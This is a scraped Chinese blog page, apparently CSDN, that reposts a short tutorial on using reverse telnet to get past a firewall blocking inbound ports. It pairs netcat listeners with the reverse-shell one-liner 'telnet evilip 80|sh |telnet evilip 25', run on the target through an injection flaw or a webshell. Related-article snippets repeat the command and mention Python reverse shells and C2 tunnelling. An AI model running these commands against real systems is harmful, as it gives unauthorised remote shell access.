反向Telnet突破防火墙封锁

最新推荐文章于 2025-01-08 16:17:34 发布
最新推荐文章于 2025-01-08 16:17:34 发布
阅读量292 收藏
点赞数
CC 4.0 BY-SA版权
原文链接:https://yq.aliyun.com/articles/439750
本文介绍了一种在目标防火墙全面封锁端口的情况下,利用反向Telnet进行突破访问的方法。具体步骤包括:首先在攻击者端使用NC监听特定端口;然后通过注入漏洞、命令执行漏洞或Webshell,在目标机上执行特定命令启动反向Telnet连接。

反向Telnet可以用在当目标防火墙对端口全面封锁以后,我们可以通过此方法实现突破访问.

首先在Win下也就是攻击者的CMD下用NC分别监听80和25端口,这两个端口可以任意改变,只要目标防火墙没有禁止即可.

如图:

 

然后我们可以通过注入漏洞,OS命令执行漏洞或Webshell在目标机执行

telnet evilip 80|sh |telnet evilip 25来启动反向Telnet

如图:

 

 

 


















本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/410004,如需转载请自行联系原作者

红队内网攻防渗透:内网渗透之内网对抗:隧道技术篇&防火墙组策略&ICMP&DNS&SMB协议&出网判断&C2上线&解决方案
HACKONE的博客
06-21 579
ICMP 通过 PING 命令访问远程计算机,建立 ICMP 隧道,将 TCP/UDP 数据封装到 ICMP 的 PING 数据包中,从而穿过防火墙防火墙一般不会屏蔽 PING 数据包,实现不受限制的访问。添加新的A记录 这里按照C2重新新建一个主机记录将C2.xiaodi8.com指向我们的CS服务器地址。现在成功上线了web,但是要使用web服务器访问2.22的网站访问不了,出站是允许icmp。利用各种隧道技术,以网络防火墙允许的协议,过网络防火墙封锁,实现访问被封锁的目标网络。
反向telnet.rar
07-25
反向telnet cisco路由器支持进来(incoming)的异步线路连接(正向连接),也支持外出(outgoing)的异步线路连接(反向telnet连接)。用户可以通过路由器反向telnet到其他设备上进行配置。
反向Telnet,Delphi实现【原创】
12-19
反向Telnet反向连接 2008年以前用Delphi 7 写的小工具 当时在矿山使用 了我们开发的系统软件,没有宽带,使用GPRS无线数据上传 当时是为了维护方便,写了这个小工具! 分服务器端(主控端——swServer.dpr)和客户端(被控端——swClient2.dpr,安装在矿山电脑上), 公司有ADSL,但IP地址是动态的, 主控端启动后会在公司的网站(使用万网的主机)上登记IP,被控端启动后自动从公司网站获取IP, 然后主动连接主控端,主控端可以输入任何有效命令(包括DOS命令,或任何DOS程序),被控端接受 到指令后进行执行,并将执行结果返回主控端。 最值得注意的是客户端的程序,自认为技术含量很高!编译后才20多K!未使用Delphi的Form,而是使用类VC的 消息循环、winSocket、管道、重定向等,从Socket接受命令直接转到CMD执行,并将执行结果通过管道输出到Socket, 返回给主控端!
《Cryptographic Reverse Firewalls》密码学反式防火墙论文的部分翻译
ChloeClockc的博客
03-15 1230
原文链接 https://eprint.iacr.org/2014/758.pdf 作者:Ilya Mironov,Noah Stephens-Davidowitz 部分翻译 摘要 最近爱德华·斯诺登的揭秘表明,用户的硬件和软件可能以各种各样方式被利用而攻击它自身(例如泄露她的隐私信息)。并且最近一系列的公告也显示广泛应用的密码学软件经常包含削弱其自身安全性的漏洞。这促使我们考虑以下(看似荒谬的)...
反向TELNET
xqhrs232的专栏
04-06 2841
原文地址::http://blog.sina.com.cn/s/blog_4a023ebb010005gc.html 相关文章 1、反向telnet配置 (留着自己以后用 呵呵)----http://blog.youkuaiyun.com/sorrowegg/article/details/5774147 2、反向Telnet  ----http://mzhehome.blog.163.co
内网基础-防火墙-隧道技术
qq_45694932的博客
01-08 1180
第一个上线就走反向或者正向第二个上线走反向(第二个防火墙阻止入站)
【计算机基础】防火墙
XiaoYabeI的博客
05-01 3256
工程师CCNA=HCIA 资深工程师CCNP=HCIP 技术专家CCIE=HCIE IPS:入侵防御系统,发现攻击和入侵进行阻断 IDS:入侵检测系统,检测有无攻击 漏洞扫描:发现本地服务器/PC,存在哪些中高低危的风险,解决漏洞保证网络安全 DoS:拒绝服务,攻击有计算机网络宽带攻击和连通性攻击 DDOS:分布式拒绝服务攻击可以使很多的计算机在同一时间遭受到攻击,使攻击的目标无法正常使用 防火墙是一个系统,通过过滤传输数据达到防止未经授权的网络传输侵入私有网络,阻止不必要流量的同时允许必要流
有公网地址,但是无法使用80端口为什么
最新发布
04-02
根据引用中的信息,可能的原因包括端口被占用、防火墙或安全组未放行、服务未正确监听、ISP封锁、NAT问题,以及公网IP是否正确。需要逐个检查这些可能性。 第一步,检查本地服务是否监听80端口。用户可能没有启动...
The original message was received at Thu, 20 Mar 2025 11:36:59 +0800 (+08) from [10.191.33.61] ----- The following addresses had permanent fatal errors ----- <le.zhang2@dell.com> (reason: 550 5.7.1 <le.zhang2@dell.com>... Relaying denied. IP name lookup failed [10.191.33.98]) ----- Transcript of session follows ----- ... while talking to [10.191.10.124]: >>> DATA <<< 550 5.7.1 <le.zhang2@dell.com>... Relaying denied. IP name lookup failed [10.191.33.98] 550 5.1.1 <le.zhang2@dell.com>... User unknown <<< 503 5.0.0 Need RCPT (recipient)分析一下
03-23
- **问题根源**:服务器25端口可能被防火墙或ISP封锁,或未开放中继权限。 - **解决方案**: - 检查服务器防火墙规则,确保25端口(或加密端口465/587)开放。 - 联系ISP确认是否允许外发SMTP流量。 --- #### 5....
1-2webshell提权 防火墙到3389
01-22
1-2webshell提权 防火墙到33891-2webshell提权 防火墙到33891-2webshell提权 防火墙到3389
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
反向telnet
weixin_33806914的博客
02-21 175
R4(config)#do show line Tty Typ Tx/Rx A Modem Roty AccO AccI Uses Noise Overruns Int * 0 CTY - - - - - 0 0 0/0 - ...
反向telnet连接
weixin_33805992的博客
06-29 598
首先使用nc工具进行监听: nc -l -n -v -p 80 nv -l -n -v -p 25 然后: /bin/telnet evil_hackers_ip 80 | /bin/sh | /bin/sh | /bin/telnet evil_hackers_ip 25 转载于:https://www.cnblogs.com/zjfdlut/p/3381284.html...
Cisco路由器做反向Telnet做终端服务器
weixin_34273479的博客
09-28 625
Cisco路由器反向Telnet做终端服务器 Cisco路由器的异步串口支持反向Telnet,因此可以用这个功能将一台2509配置成终端服务器,连接实验环 境的其他Cisco设备,具体做法如下: 将Cisco 2509安装八爪鱼线缆,注意只安装线缆,不装DB25-RJ45转换器。将八爪鱼线缆RJ45一头插入其他Cisco设备的Console口。 然后配置这台2509:...
Reverse telnet设置
weixin_33772645的博客
11-29 538
Reverse telnet 又称为反向telnet,反远程登录,此处反的意思为从异步串行端口向外建立连接,与一般为外向内连接区别。使用模块NM-8A/16A或者SIC-8A/16A,下联八爪线,每个LINE对应于不同设备扩展口。相当于telnet 192.168.1.200 端口号 此处的端口号为2000+线路号,分别对应于console口号 teln...
反向telnet配置 (留着自己以后用 呵呵)
sorrowegg的专栏
07-29 2036
<br />dis ver                                                                         <br /> Copyright Notice:                                                              <br /> All rights reserved (Jul 18 2005).                                           
如何使用telnet进行反向连接
01-07 2546
原文链接 http://www.91ri.org/7835.html  解决的思路有点意思,所以转过来 telnet反向连接在实战中的作用: 案例1:黑客试图获取某工业级数据包检测防火墙或者路由器之后(基于路由的防火墙,不代理任何服务)的一台UNIX的系统的WEB服务器的访问权。防火墙仅对外网开放了80及443,这台WEB服务器存在phf漏洞(phf漏洞是什么自行脑补),黑客可远程对该web
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值